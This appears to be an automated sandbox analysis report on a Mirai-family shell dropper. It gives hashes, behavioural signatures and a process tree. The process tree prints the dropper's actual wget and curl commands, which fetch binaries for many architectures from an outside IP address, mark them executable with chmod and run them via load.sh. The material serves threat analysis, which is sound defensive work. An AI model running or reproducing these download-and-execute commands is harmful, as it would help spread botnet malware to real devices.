Analysis
-
max time kernel
149s -
max time network
153s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
18-10-2024 01:18
Static task
static1
Behavioral task
behavioral1
Sample
220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh
Resource
debian9-mipsbe-20240418-en
General
-
Target
220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh
-
Size
4KB
-
MD5
80299ebce287b053ec82cff873ddf3b4
-
SHA1
1cf8df1f0b5e0903ac1a103e4acee85a5f0d6e00
-
SHA256
220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c
-
SHA512
0f48a97903275e97c681719d763775f5a3817b7d1c40ef475d9e444b1fea5d2f1036237b676ff2d22446f80a9ee882d7f738dbd1f17d8c677082d0a63ffc86f6
-
SSDEEP
96:vNVjNNw4gNx/5NN7lNdMdEpFyNn9/NUssN2mmNRfpN3tnNue2NySqNGWeNPl0:YO4Fs
Malware Config
Extracted
mirai
UNSTABLE
Signatures
-
Contacts a large (211384) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1548 chmod 1554 chmod 1584 chmod 1518 chmod 1524 chmod 1536 chmod 1578 chmod 1505 chmod 1530 chmod 1589 chmod 1560 chmod 1566 chmod 1493 chmod 1511 chmod -
Executes dropped EXE 14 IoCs
ioc pid Process /tmp/load.sh 1494 load.sh /tmp/load.sh 1506 load.sh /tmp/load.sh 1512 load.sh /tmp/load.sh 1519 load.sh /tmp/load.sh 1525 load.sh /tmp/load.sh 1531 load.sh /tmp/load.sh 1537 load.sh /tmp/load.sh 1549 load.sh /tmp/load.sh 1555 load.sh /tmp/load.sh 1561 load.sh /tmp/load.sh 1567 load.sh /tmp/load.sh 1579 load.sh /tmp/load.sh 1585 load.sh /tmp/load.sh 1590 load.sh -
Modifies Watchdog functionality 1 TTPs 4 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog load.sh File opened for modification /dev/misc/watchdog load.sh File opened for modification /dev/watchdog load.sh File opened for modification /dev/misc/watchdog load.sh -
Enumerates active TCP sockets 1 TTPs 1 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp load.sh -
Enumerates running processes
Discovers information about currently running processes on the system
-
Writes file to system bin folder 4 IoCs
description ioc Process File opened for modification /bin/watchdog load.sh File opened for modification /sbin/watchdog load.sh File opened for modification /bin/watchdog load.sh File opened for modification /sbin/watchdog load.sh -
resource yara_rule behavioral1/files/fstream-1.dat upx behavioral1/files/fstream-4.dat upx behavioral1/files/fstream-5.dat upx behavioral1/files/fstream-6.dat upx behavioral1/files/fstream-7.dat upx -
Changes its process name 2 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself a 1494 load.sh Changes the process name, possibly in an attempt to hide itself a 1567 load.sh -
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/tcp load.sh -
description ioc Process File opened for reading /proc/443/cmdline load.sh File opened for reading /proc/659/cmdline load.sh File opened for reading /proc/1608/cmdline load.sh File opened for reading /proc/453/cmdline load.sh File opened for reading /proc/438/cmdline load.sh File opened for reading /proc/444/cmdline load.sh File opened for reading /proc/510/cmdline load.sh File opened for reading /proc/1067/cmdline load.sh File opened for reading /proc/1471/cmdline load.sh File opened for reading /proc/1111/cmdline load.sh File opened for reading /proc/1140/cmdline load.sh File opened for reading /proc/471/cmdline load.sh File opened for reading /proc/1174/cmdline load.sh File opened for reading /proc/1152/cmdline load.sh File opened for reading /proc/451/cmdline load.sh File opened for reading /proc/1087/cmdline load.sh File opened for reading /proc/1150/cmdline load.sh File opened for reading /proc/1573/cmdline load.sh File opened for reading /proc/1276/cmdline load.sh File opened for reading /proc/1312/cmdline load.sh File opened for reading /proc/1602/cmdline load.sh File opened for reading /proc/1115/cmdline load.sh File opened for reading /proc/700/cmdline load.sh File opened for reading /proc/531/cmdline load.sh File opened for reading /proc/1275/cmdline load.sh File opened for reading /proc/1177/cmdline load.sh File opened for reading /proc/945/cmdline load.sh File opened for reading /proc/1136/cmdline load.sh File opened for reading /proc/1159/cmdline load.sh File opened for reading /proc/1174/cmdline load.sh File opened for reading /proc/1501/cmdline load.sh File opened for reading /proc/535/cmdline load.sh File opened for reading /proc/586/cmdline load.sh File opened for reading /proc/1037/cmdline load.sh File opened for reading /proc/1054/cmdline load.sh File opened for reading /proc/1500/cmdline load.sh File opened for reading /proc/1594/cmdline load.sh File opened for reading /proc/1137/cmdline load.sh File opened for reading /proc/1067/cmdline load.sh File opened for reading /proc/1142/cmdline load.sh File opened for reading /proc/442/cmdline load.sh File opened for reading /proc/851/cmdline load.sh File opened for reading /proc/1229/cmdline load.sh File opened for reading /proc/1620/cmdline load.sh File opened for reading /proc/1054/cmdline load.sh File opened for reading /proc/1159/cmdline load.sh File opened for reading /proc/1482/cmdline load.sh File opened for reading /proc/851/cmdline load.sh File opened for reading /proc/916/cmdline load.sh File opened for reading /proc/1056/cmdline load.sh File opened for reading /proc/1007/cmdline load.sh File opened for reading /proc/1284/cmdline load.sh File opened for reading /proc/1229/cmdline load.sh File opened for reading /proc/1059/cmdline load.sh File opened for reading /proc/958/cmdline load.sh File opened for reading /proc/1165/cmdline load.sh File opened for reading /proc/425/cmdline load.sh File opened for reading /proc/916/cmdline load.sh File opened for reading /proc/588/cmdline load.sh File opened for reading /proc/1002/cmdline load.sh File opened for reading /proc/1087/cmdline load.sh File opened for reading /proc/1106/cmdline load.sh File opened for reading /proc/1475/cmdline load.sh File opened for reading /proc/1136/cmdline load.sh -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1496 wget 1503 curl 1504 cat -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/db0fa4b8db0333367e9bda3ab68b8042.arm6 curl File opened for modification /tmp/db0fa4b8db0333367e9bda3ab68b8042.x86 wget File opened for modification /tmp/db0fa4b8db0333367e9bda3ab68b8042.mips curl File opened for modification /tmp/db0fa4b8db0333367e9bda3ab68b8042.arm5 curl File opened for modification /tmp/db0fa4b8db0333367e9bda3ab68b8042.arm curl File opened for modification /tmp/db0fa4b8db0333367e9bda3ab68b8042.arm5 wget File opened for modification /tmp/db0fa4b8db0333367e9bda3ab68b8042.arm7 curl File opened for modification /tmp/db0fa4b8db0333367e9bda3ab68b8042.ppc curl File opened for modification /tmp/db0fa4b8db0333367e9bda3ab68b8042.i686 wget File opened for modification /tmp/db0fa4b8db0333367e9bda3ab68b8042.sh4 curl File opened for modification /tmp/db0fa4b8db0333367e9bda3ab68b8042.x86 curl File opened for modification /tmp/load.sh 220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh File opened for modification /tmp/db0fa4b8db0333367e9bda3ab68b8042.mips wget File opened for modification /tmp/db0fa4b8db0333367e9bda3ab68b8042.mpsl curl File opened for modification /tmp/db0fa4b8db0333367e9bda3ab68b8042.ppc wget File opened for modification /tmp/db0fa4b8db0333367e9bda3ab68b8042.i686 curl File opened for modification /tmp/db0fa4b8db0333367e9bda3ab68b8042.mpsl wget File opened for modification /tmp/db0fa4b8db0333367e9bda3ab68b8042.spc curl File opened for modification /tmp/db0fa4b8db0333367e9bda3ab68b8042.sh4 wget File opened for modification /tmp/db0fa4b8db0333367e9bda3ab68b8042.arm wget File opened for modification /tmp/db0fa4b8db0333367e9bda3ab68b8042.arm6 wget File opened for modification /tmp/db0fa4b8db0333367e9bda3ab68b8042.arm7 wget File opened for modification /tmp/db0fa4b8db0333367e9bda3ab68b8042.m68k wget File opened for modification /tmp/db0fa4b8db0333367e9bda3ab68b8042.x86_64 curl File opened for modification /tmp/db0fa4b8db0333367e9bda3ab68b8042.m68k curl File opened for modification /tmp/db0fa4b8db0333367e9bda3ab68b8042.spc wget File opened for modification /tmp/db0fa4b8db0333367e9bda3ab68b8042.arc curl File opened for modification /tmp/db0fa4b8db0333367e9bda3ab68b8042.arc wget
Processes
-
/tmp/220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh/tmp/220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh1⤵
- Writes file to tmp directory
PID:1478 -
/usr/bin/wgetwget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x862⤵
- Writes file to tmp directory
PID:1481
-
-
/usr/bin/curlcurl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x862⤵
- Writes file to tmp directory
PID:1491
-
-
/bin/catcat db0fa4b8db0333367e9bda3ab68b8042.x862⤵PID:1492
-
-
/bin/chmodchmod +x 220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh config-err-TtKvLo db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-Z8AOk12⤵
- File and Directory Permissions Modification
PID:1493
-
-
/tmp/load.sh./load.sh thinkphp.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Changes its process name
- Reads runtime system information
PID:1494
-
-
/usr/bin/wgetwget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1496
-
-
/usr/bin/curlcurl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1503
-
-
/bin/catcat db0fa4b8db0333367e9bda3ab68b8042.mips2⤵
- System Network Configuration Discovery
PID:1504
-
-
/bin/chmodchmod +x 220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh config-err-TtKvLo db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-Z8AOk12⤵
- File and Directory Permissions Modification
PID:1505
-
-
/tmp/load.sh./load.sh thinkphp.exploit2⤵
- Executes dropped EXE
PID:1506
-
-
/usr/bin/wgetwget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mpsl2⤵
- Writes file to tmp directory
PID:1508
-
-
/usr/bin/curlcurl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mpsl2⤵
- Writes file to tmp directory
PID:1509
-
-
/bin/catcat db0fa4b8db0333367e9bda3ab68b8042.mpsl2⤵PID:1510
-
-
/bin/chmodchmod +x 220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh config-err-TtKvLo db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-Z8AOk12⤵
- File and Directory Permissions Modification
PID:1511
-
-
/tmp/load.sh./load.sh thinkphp.exploit2⤵
- Executes dropped EXE
PID:1512
-
-
/usr/bin/wgetwget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm2⤵
- Writes file to tmp directory
PID:1514
-
-
/usr/bin/curlcurl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm2⤵
- Writes file to tmp directory
PID:1516
-
-
/bin/catcat db0fa4b8db0333367e9bda3ab68b8042.arm2⤵PID:1517
-
-
/bin/chmodchmod +x 220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh config-err-TtKvLo db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-Z8AOk12⤵
- File and Directory Permissions Modification
PID:1518
-
-
/tmp/load.sh./load.sh thinkphp.exploit2⤵
- Executes dropped EXE
PID:1519
-
-
/usr/bin/wgetwget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm52⤵
- Writes file to tmp directory
PID:1521
-
-
/usr/bin/curlcurl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm52⤵
- Writes file to tmp directory
PID:1522
-
-
/bin/catcat db0fa4b8db0333367e9bda3ab68b8042.arm52⤵PID:1523
-
-
/bin/chmodchmod +x 220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh config-err-TtKvLo db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.arm5 db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-Z8AOk12⤵
- File and Directory Permissions Modification
PID:1524
-
-
/tmp/load.sh./load.sh thinkphp.exploit2⤵
- Executes dropped EXE
PID:1525
-
-
/usr/bin/wgetwget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm62⤵
- Writes file to tmp directory
PID:1527
-
-
/usr/bin/curlcurl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm62⤵
- Writes file to tmp directory
PID:1528
-
-
/bin/catcat db0fa4b8db0333367e9bda3ab68b8042.arm62⤵PID:1529
-
-
/bin/chmodchmod +x 220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh config-err-TtKvLo db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.arm5 db0fa4b8db0333367e9bda3ab68b8042.arm6 db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-Z8AOk12⤵
- File and Directory Permissions Modification
PID:1530
-
-
/tmp/load.sh./load.sh thinkphp.exploit2⤵
- Executes dropped EXE
PID:1531
-
-
/usr/bin/wgetwget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm72⤵
- Writes file to tmp directory
PID:1533
-
-
/usr/bin/curlcurl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm72⤵
- Writes file to tmp directory
PID:1534
-
-
/bin/catcat db0fa4b8db0333367e9bda3ab68b8042.arm72⤵PID:1535
-
-
/bin/chmodchmod +x 220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh config-err-TtKvLo db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.arm5 db0fa4b8db0333367e9bda3ab68b8042.arm6 db0fa4b8db0333367e9bda3ab68b8042.arm7 db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-z9feDq systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-Z8AOk12⤵
- File and Directory Permissions Modification
PID:1536
-
-
/tmp/load.sh./load.sh thinkphp.exploit2⤵
- Executes dropped EXE
PID:1537
-
-
/usr/bin/wgetwget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.ppc2⤵
- Writes file to tmp directory
PID:1539
-
-
/usr/bin/curlcurl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.ppc2⤵
- Writes file to tmp directory
PID:1546
-
-
/bin/catcat db0fa4b8db0333367e9bda3ab68b8042.ppc2⤵PID:1547
-
-
/bin/chmodchmod +x 220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh config-err-TtKvLo db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.arm5 db0fa4b8db0333367e9bda3ab68b8042.arm6 db0fa4b8db0333367e9bda3ab68b8042.arm7 db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.ppc db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-Lt40RB systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-Z8AOk12⤵
- File and Directory Permissions Modification
PID:1548
-
-
/tmp/load.sh./load.sh thinkphp.exploit2⤵
- Executes dropped EXE
PID:1549
-
-
/usr/bin/wgetwget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.m68k2⤵
- Writes file to tmp directory
PID:1551
-
-
/usr/bin/curlcurl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.m68k2⤵
- Writes file to tmp directory
PID:1552
-
-
/bin/catcat db0fa4b8db0333367e9bda3ab68b8042.m68k2⤵PID:1553
-
-
/bin/chmodchmod +x 220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh config-err-TtKvLo db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.arm5 db0fa4b8db0333367e9bda3ab68b8042.arm6 db0fa4b8db0333367e9bda3ab68b8042.arm7 db0fa4b8db0333367e9bda3ab68b8042.m68k db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.ppc db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-Lt40RB systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-Z8AOk12⤵
- File and Directory Permissions Modification
PID:1554
-
-
/tmp/load.sh./load.sh thinkphp.exploit2⤵
- Executes dropped EXE
PID:1555
-
-
/usr/bin/wgetwget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.spc2⤵
- Writes file to tmp directory
PID:1557
-
-
/usr/bin/curlcurl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.spc2⤵
- Writes file to tmp directory
PID:1558
-
-
/bin/catcat db0fa4b8db0333367e9bda3ab68b8042.spc2⤵PID:1559
-
-
/bin/chmodchmod +x 220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh config-err-TtKvLo db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.arm5 db0fa4b8db0333367e9bda3ab68b8042.arm6 db0fa4b8db0333367e9bda3ab68b8042.arm7 db0fa4b8db0333367e9bda3ab68b8042.m68k db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.ppc db0fa4b8db0333367e9bda3ab68b8042.spc db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-Lt40RB systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-Z8AOk12⤵
- File and Directory Permissions Modification
PID:1560
-
-
/tmp/load.sh./load.sh thinkphp.exploit2⤵
- Executes dropped EXE
PID:1561
-
-
/usr/bin/wgetwget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.i6862⤵
- Writes file to tmp directory
PID:1563
-
-
/usr/bin/curlcurl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.i6862⤵
- Writes file to tmp directory
PID:1564
-
-
/bin/catcat db0fa4b8db0333367e9bda3ab68b8042.i6862⤵PID:1565
-
-
/bin/chmodchmod +x 220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh config-err-TtKvLo db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.arm5 db0fa4b8db0333367e9bda3ab68b8042.arm6 db0fa4b8db0333367e9bda3ab68b8042.arm7 db0fa4b8db0333367e9bda3ab68b8042.i686 db0fa4b8db0333367e9bda3ab68b8042.m68k db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.ppc db0fa4b8db0333367e9bda3ab68b8042.spc db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-Lt40RB systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-Z8AOk12⤵
- File and Directory Permissions Modification
PID:1566
-
-
/tmp/load.sh./load.sh thinkphp.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:1567
-
-
/usr/bin/wgetwget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.sh42⤵
- Writes file to tmp directory
PID:1569
-
-
/usr/bin/curlcurl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.sh42⤵
- Writes file to tmp directory
PID:1576
-
-
/bin/catcat db0fa4b8db0333367e9bda3ab68b8042.sh42⤵PID:1577
-
-
/bin/chmodchmod +x 220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh config-err-TtKvLo db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.arm5 db0fa4b8db0333367e9bda3ab68b8042.arm6 db0fa4b8db0333367e9bda3ab68b8042.arm7 db0fa4b8db0333367e9bda3ab68b8042.i686 db0fa4b8db0333367e9bda3ab68b8042.m68k db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.ppc db0fa4b8db0333367e9bda3ab68b8042.sh4 db0fa4b8db0333367e9bda3ab68b8042.spc db0fa4b8db0333367e9bda3ab68b8042.x86 load.sh netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-Lt40RB systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-Z8AOk12⤵
- File and Directory Permissions Modification
PID:1578
-
-
/tmp/load.sh./load.sh thinkphp.exploit2⤵
- Executes dropped EXE
PID:1579
-
-
/usr/bin/wgetwget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86_642⤵PID:1581
-
-
/usr/bin/curlcurl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86_642⤵
- Writes file to tmp directory
PID:1582
-
-
/bin/catcat db0fa4b8db0333367e9bda3ab68b8042.x86_642⤵PID:1583
-
-
